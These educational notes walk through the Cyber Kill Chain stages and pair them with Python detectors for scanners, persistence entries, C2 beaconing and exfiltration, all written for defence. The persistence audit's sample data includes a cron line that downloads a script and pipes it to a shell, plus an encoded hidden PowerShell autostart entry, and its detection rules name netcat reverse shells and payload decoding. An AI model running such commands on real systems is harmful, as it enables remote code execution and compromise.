Framework created by Lockheed Martin to model the stages of an intrusion.
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
Understanding the stages matters because each one depends on the previous: breaking any single link stops the chain. When attacker activity is detected, map it to a stage to work out which actions must already have happened and which are likely to follow.
Blue Teams use the chain to identify where security measures are lacking and take the appropriate action at each stage.
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command & Control (C2)
7. Actions on Objectives
---
## 1 - Reconnaissance
### Passive
Collecting information about the target from public sources without touching the target's systems (e.g. Google search). Leaves no trace on the target.
### Active
Acquires information by interacting with the target directly: web requests, pings, port scans, anything that requires a response from the target and can therefore be logged by it.
### Adversary Goals
The adversary wants to obtain as much of the following information as possible, and more:
- version information of servers and software
- information about the target already released in open sources
- email addresses
- internal or personal information about employees
- internet-facing devices belonging to the target
- security vulnerabilities on internet-facing servers
- the organization's IP address blocks
- vendors the organization works with
- Tools: Shodan, ZoomEye (search engines for internet-connected devices)
### Defender Goals
Restrict the amount of information the attacker can obtain.
- detect information disclosure with an external penetration test
- obtain leaked information about the organization from Threat Intelligence sources
- keep internal organizational documents off the internet
- monitor traffic to internet-facing systems
- apply updates as soon as they are available so newly disclosed vulnerabilities cannot be exploited
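Monitoring traffic to internet-facing systems is where active reconnaissance becomes visible. The following is an added example, not part of the original notes: a small scanner detector run over constructed Apache/nginx combined-format access log lines. It flags clients that make many requests, spread over many distinct paths, mostly answered with a 4xx status, which is the pattern that directory brute-forcers and vulnerability scanners leave. The thresholds and the sample log lines are illustrative assumptions.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: 203.0.113.7 probes well-known sensitive paths and gets
# 404s; 198.51.100.20 is an ordinary visitor who hits one stale link.
PROBE_PATHS = [
    "/.env", "/.git/config", "/wp-login.php", "/phpmyadmin/", "/admin/",
    "/backup.zip", "/config.php", "/server-status", "/actuator/env",
    "/xmlrpc.php", "/.aws/credentials", "/cgi-bin/test.cgi",
]
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{i:02d} +0000] "GET {p} HTTP/1.1" '
    '404 153 "-" "python-requests/2.31"'
    for i, p in enumerate(PROBE_PATHS)
] + [
    '198.51.100.20 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Oct/2023:13:56:04 +0000] "GET /about HTTP/1.1" 200 2210 "https://example.com/" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Oct/2023:13:56:09 +0000] "GET /img/logo.png HTTP/1.1" 200 8800 "https://example.com/about" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Oct/2023:13:56:15 +0000] "GET /old-page HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_scanners(lines, min_requests=10, min_error_ratio=0.5, min_distinct_paths=8):
    """Return {ip: summary} for clients whose request pattern looks like probing:
    at least min_requests requests over at least min_distinct_paths distinct paths,
    with at least min_error_ratio of them answered 4xx."""
    per_ip = defaultdict(lambda: {"requests": 0, "errors": 0, "paths": set(), "uas": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; in production count these separately
        s = per_ip[rec["ip"]]
        s["requests"] += 1
        if rec["status"].startswith("4"):
            s["errors"] += 1
        s["paths"].add(rec["path"])
        s["uas"].add(rec["ua"])

    flagged = {}
    for ip, s in per_ip.items():
        ratio = s["errors"] / s["requests"]
        if (s["requests"] >= min_requests
                and len(s["paths"]) >= min_distinct_paths
                and ratio >= min_error_ratio):
            flagged[ip] = {
                "requests": s["requests"],
                "distinct_paths": len(s["paths"]),
                "error_ratio": round(ratio, 2),
                "user_agents": sorted(s["uas"]),
                "sample_paths": sorted(s["paths"])[:5],
            }
    return flagged


if __name__ == "__main__":
    for ip, summary in find_scanners(SAMPLE_LOG).items():
        print(ip, summary)
```

The error ratio matters more than the raw request count: a crawler or a busy legitimate user also produces many requests, but mostly 200s. In a real deployment the counts should be kept per time window so that a slow scan spread over days is still caught, and the flagged IPs fed to the firewall or WAF rather than only printed.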
---
## 2 - Weaponization
Using the information gathered in Recon, the attacker compiles the tools needed for the attack, or develops them directly.
The attack has not yet commenced, and the victim is likely unaware of the attacker.
### Adversary Goals
Build or otherwise prepare the essential components of the attack.
- create malware
- develop exploits
- create malicious content for the phishing attempt
  - email template, trojanized document
- identify the best instrument for the attack
### Defender Goals
Not possible to directly prevent the attack at this stage: it happens entirely on the attacker's side.
- check systems for the security vulnerabilities identified so far
- install security updates as soon as possible
- analyze the impact of known or newly produced attack tools on the organization's systems
- track those tools and be able to detect when they are used
---
## 3 - Delivery
Execution of the prepared attack: the payload is delivered to the victim by an appropriate channel.
### Adversary Goals
A variety of methods to deliver the payload to the victim:
- malicious URL via email
- malware as a file attachment via email
- malware via website
- malicious URL via social media
- malware via social media
- direct upload to the target server if possible
- physical delivery of malware via USB
### Defender Goals
Precautionary measures at this stage. They cannot totally prevent the attack, but they minimize the risk.
- treat every URL in email content with skepticism; open it only in a sandbox environment
- scan email attachments with antivirus
- deploy email security products
- provide users and employees with infosec training
- constantly monitor server access and record logs
- effective use and management of security products like firewalls
- conduct detailed analysis when needed
- detect anomalies and determine their cause
---
## 4 - Exploitation
The attacker triggers the malicious content delivered in step 3.
### Adversary Goals
The attacker has basic knowledge of the program being exploited and now runs the tool to exploit it.
- execute an exploit for a hardware vulnerability
- execute an exploit for a vulnerability in software or the operating system
- execute malware
### Defender Goals
This stage is much more intricate and labor-intensive for the blue team than the others, typically because previously unseen malware and exploits add a layer of complexity.
- train employees on when it is, and is not, necessary to open a file uploaded to the organization's systems
- constantly monitor the organization's security operations
- track published security vulnerabilities affecting the organization's assets
- write monitoring rules that detect when exploitation occurs
- install security updates for the organization's assets
- monitor activity on endpoints with EDR products
- provide secure coding training to developers to prevent vulnerabilities in locally developed applications
- conduct pentests on the organization's assets regularly
- run automated vulnerability scans regularly and review the reports
- organize authorizations on the institution's assets so that each account has only the authority it needs (least privilege)
---
## 5 - Installation
Maintain persistence on the exploited target. The attacker establishes an access path that can be used at any time, typically a backdoor on the system. Since the exploited vulnerability will eventually be patched, a method independent of the exploit is needed to keep access. Privilege escalation is typically attempted at this stage to secure persistence.
### Adversary Goals
Perform activities within the authority obtained on the exploited system. While doing so, the attacker tries to leave as few traces as possible, to remain undetected for as long as the attack takes.
- install malware on the victim's device
- place a backdoor on the victim's system
- install a web shell on a web server
- add a service, firewall rule, or scheduled task to ensure persistence on the victim device
### Defender Goals
Threat Hunters are deployed. If an attacker reaches this stage, there is malicious activity that was not detected automatically. Whether or not an attacker is known to be present, the SOC team operates as if one is always present in the system.
- Network Security Monitoring on all assets
- use EDR to be aware of configuration changes on each endpoint
- restrict access to critical files on systems and monitor that access
- restrict access to critical paths
- allow use of admin privileges only where mandatory
- detect malicious process activity by monitoring the processes running on systems
- allow only executables with a valid signature to run on the system (application allowlisting)
- detect anomalies in all monitored system activity and find the root cause
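Services, scheduled tasks, cron jobs and Run keys are exactly the autostart locations the installation stage abuses, so a hunter's first pass is usually to audit them. The following is an added example, not part of the original notes: it scores a constructed snapshot of autostart entries (the shape an EDR export or a collection script would give) against a few persistence tell-tales: executing from a user-writable directory, download-and-run one-liners, encoded PowerShell, netcat reverse shells, and unsigned binaries. The heuristics and the snapshot are illustrative assumptions, not a vendor rule set.

```python
import re

# Locations a low-privileged user can write to. A service, scheduled task
# or cron job launching a binary from here is a classic persistence tell-tale.
# Illustrative list, compared case-insensitively.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/",
                 "\\appdata\\", "\\temp\\", "\\users\\public\\")

# Command-line patterns that usually mean "fetch and run" or deliberate obfuscation.
SUSPICIOUS_CMD = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I), "download piped to shell"),
    (re.compile(r"powershell.*-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded PowerShell"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s", re.I), "netcat with -e (reverse shell)"),
    (re.compile(r"\b(base64\s+-d|certutil\s+-decode)\b", re.I), "inline decoding of a payload"),
]

# Constructed snapshot of autostart entries: cron, systemd units, Run keys,
# scheduled tasks. "signed" is None where code signing does not apply.
SNAPSHOT = [
    {"name": "systemd:sshd.service",
     "command": "/usr/sbin/sshd -D", "signed": None},
    {"name": "cron:root",
     "command": "*/5 * * * * curl -s http://203.0.113.9/u.sh | sh", "signed": None},
    {"name": "systemd:update-helper.service",
     "command": "/dev/shm/.x/updater --quiet", "signed": None},
    {"name": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "command": "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background",
     "signed": True},
    {"name": "SchTask:\\Microsoft\\Windows\\SyncCheck",
     "command": "C:\\Users\\Public\\sync.exe", "signed": False},
    {"name": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Helper",
     "command": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "signed": True},
]


def audit_entry(entry):
    """Return the reasons an autostart entry looks suspicious (empty list if none)."""
    cmd = entry["command"]
    reasons = []
    if any(d in cmd.lower() for d in WRITABLE_DIRS):
        reasons.append("executes from user-writable location")
    for pattern, why in SUSPICIOUS_CMD:
        if pattern.search(cmd):
            reasons.append(why)
    if entry.get("signed") is False:  # None means signing is not applicable (scripts, cron)
        reasons.append("unsigned binary")
    return reasons


def audit(entries):
    """Map entry name -> reasons, for entries with at least one finding."""
    findings = {}
    for entry in entries:
        reasons = audit_entry(entry)
        if reasons:
            findings[entry["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(SNAPSHOT).items():
        print(f"{name}: {', '.join(reasons)}")
```

The point of the audit is the diff, not the single run: take the snapshot on a known-good baseline, re-collect periodically, and investigate every entry that is new or changed even when it trips none of the heuristics above, since a well-made backdoor masquerades as a legitimate service.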
---
## 6 - Command and Control (C2)
The attacker has completed the tasks needed to compromise the victim and now has a C2 server to deliver commands to it. Remote commands are sent and executed at this stage.
### Adversary Goals
Connection established between C2 and target system
- Configure C2 to communicate with victim
- Implement necessary actions to make contact with C2 possible
### Defender Goals
No stage-specific action; general monitoring and detection techniques apply.
- determine whether known C2 tools are present on systems
- block C2 server IP addresses from Cyber Threat Intelligence sources at the firewall and other security products
- detect network traffic that may be C2 communication with Network Security Monitoring
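Blocking CTI-listed addresses catches known infrastructure; beaconing analysis catches unknown infrastructure, because an implant polling its C2 on a timer produces connection gaps far more regular than a human. The following is an added example, not part of the original notes: it runs both checks over a constructed connection log, flagging destinations on a constructed blocklist and (src, dst, port) pairs whose inter-connection gaps have a low coefficient of variation. Thresholds are illustrative assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed threat-intel blocklist, as a CTI feed would supply.
CTI_BLOCKLIST = {"203.0.113.50"}

# Constructed connection log: (epoch seconds, src, dst, dst_port).
# 10.0.0.5 calls home every ~60 s with small jitter; 10.0.0.6 browses at
# irregular intervals; 10.0.0.7 makes one connection to a blocklisted host.
FLOWS = (
    [(t, "10.0.0.5", "198.51.100.77", 443)
     for t in (1000, 1061, 1119, 1181, 1240, 1299, 1361, 1420)]
    + [(t, "10.0.0.6", "192.0.2.10", 443)
       for t in (1000, 1003, 1090, 1091, 1400, 1405, 1900)]
    + [(1500, "10.0.0.7", "203.0.113.50", 8080)]
)


def intervals_by_pair(flows):
    """Group connection timestamps by (src, dst, port), sorted in time."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)
    return {k: sorted(v) for k, v in by_pair.items()}


def gap_stats(timestamps):
    """(mean gap, coefficient of variation) of the gaps between connections.
    A metronome-like beacon gives a CV near 0; human traffic is bursty (well above 0.5).
    Returns None when there are too few gaps to judge."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3:
        return None
    avg = mean(gaps)
    if avg <= 0:
        return None
    return avg, pstdev(gaps) / avg


def find_c2_candidates(flows, min_connections=6, max_cv=0.2, blocklist=CTI_BLOCKLIST):
    """Return {(src, dst, port): [reasons]} for pairs that are on the blocklist
    or show periodic, beacon-like timing."""
    hits = {}
    for pair, ts in intervals_by_pair(flows).items():
        reasons = []
        if pair[1] in blocklist:
            reasons.append("destination on CTI blocklist")
        if len(ts) >= min_connections:
            stats = gap_stats(ts)
            if stats is not None and stats[1] <= max_cv:
                reasons.append(f"periodic: {len(ts)} connections, mean gap {stats[0]:.0f}s, cv {stats[1]:.2f}")
        if reasons:
            hits[pair] = reasons
    return hits


if __name__ == "__main__":
    for pair, reasons in find_c2_candidates(FLOWS).items():
        print(pair, reasons)
```

Real implants add jitter precisely to defeat this, so the CV threshold has to be tuned against a baseline of the environment's own traffic, and the analysis is stronger over long windows (hours or days) and when combined with other signals such as constant request sizes, rare destinations, or user-agent strings that no browser on the host uses.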
---
## 7 - Actions on Objectives
The attacker carries out the actions planned in the first stages of the attack; the desired operations are followed through here.
### Adversary Goals
Objectives differ from attacker to attacker:
- encrypt files on the system with ransomware
- exfiltrate critical information/documents from the system
- damage the system by deleting critical information
- escalate privileges and move to other machines on the network to expand the scope of the attack
- collect user credentials to gain access to other devices
- collect information
- change or manipulate information in the system
### Defender Goals
The blue team may take different actions for each objective to detect and stop attacker activity. Systems must be monitored continuously. The most fundamental measure is preventing data exfiltration.
- detect anomalies in network traffic
- restrict network access to the outside and monitor it continuously
- restrict access to files/folders containing critical information and review that access regularly
- restrict authorization to databases containing critical information and continuously monitor access
- use DLP to prevent data leakage
- detect unauthorized access by users
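"Detect anomalies in network traffic" and "restrict network access to the outside" come down, for exfiltration, to one question: is a host sending far more to the outside than it normally does, and to where? The following is an added example, not part of the original notes: it builds a robust per-host baseline (median plus k times the median absolute deviation of daily outbound volume) from a constructed history, compares a constructed "today" against it, ignores internal-to-internal traffic, and reports external destinations the host has never contacted before. The network ranges, window and thresholds are illustrative assumptions.

```python
from collections import defaultdict
from statistics import median

MB = 1024 ** 2
INTERNAL_PREFIXES = ("10.", "192.168.")  # constructed definition of "inside"


def is_external(ip):
    return not ip.startswith(INTERNAL_PREFIXES)


def outbound_per_host(flows):
    """Sum bytes sent to external destinations per (day, src) and record the
    external destinations each host talked to. flows: (day, src, dst, bytes_out)."""
    totals = defaultdict(int)
    dests = defaultdict(set)
    for day, src, dst, nbytes in flows:
        if is_external(dst):
            totals[(day, src)] += nbytes
            dests[src].add(dst)
    return totals, dests


def find_exfil(history, today, k=5, floor_bytes=50 * MB):
    """Flag hosts whose outbound volume today exceeds median + k * MAD of their
    daily history (and an absolute floor). New external destinations are
    reported for context."""
    hist_totals, hist_dests = outbound_per_host(history)
    today_totals, today_dests = outbound_per_host(today)

    per_host_history = defaultdict(list)
    for (day, src), nbytes in hist_totals.items():
        per_host_history[src].append(nbytes)

    hits = {}
    for (day, src), nbytes in today_totals.items():
        samples = per_host_history.get(src)
        if not samples:
            continue  # no baseline yet; a brand-new host deserves its own review
        base = median(samples)
        mad = median(abs(x - base) for x in samples)
        spread = max(mad, MB)  # never let a perfectly flat history collapse the band to zero
        threshold = max(base + k * spread, floor_bytes)
        if nbytes > threshold:
            hits[src] = {
                "today_mb": nbytes // MB,
                "baseline_mb": base // MB,
                "threshold_mb": threshold // MB,
                "new_destinations": sorted(today_dests[src] - hist_dests[src]),
            }
    return hits


# Constructed history: seven days of normal outbound volume per host (in MB).
HISTORY = [
    (day, "10.0.0.5", "192.0.2.10", mb * MB)
    for day, mb in enumerate([42, 47, 55, 51, 44, 58, 49], start=1)
] + [
    (day, "10.0.0.6", "192.0.2.10", mb * MB)
    for day, mb in enumerate([95, 110, 102, 98, 120, 105, 100], start=1)
]

# Constructed "today": 10.0.0.5 pushes 2.3 GB to a never-before-seen host,
# 10.0.0.6 stays within its usual band, and internal traffic must be ignored.
TODAY = [
    (8, "10.0.0.5", "198.51.100.200", 2300 * MB),
    (8, "10.0.0.5", "192.0.2.10", 10 * MB),
    (8, "10.0.0.5", "10.0.0.20", 500 * MB),
    (8, "10.0.0.6", "192.0.2.10", 120 * MB),
]


if __name__ == "__main__":
    for host, info in find_exfil(HISTORY, TODAY).items():
        print(host, info)
```

Median and MAD are used instead of mean and standard deviation so that one earlier large transfer (a backup, an OS image) does not inflate the baseline and hide the next one. Volume alone is a coarse signal; a slow exfiltration spread over weeks stays under this threshold, which is why the new-destination list and DLP content inspection belong alongside it.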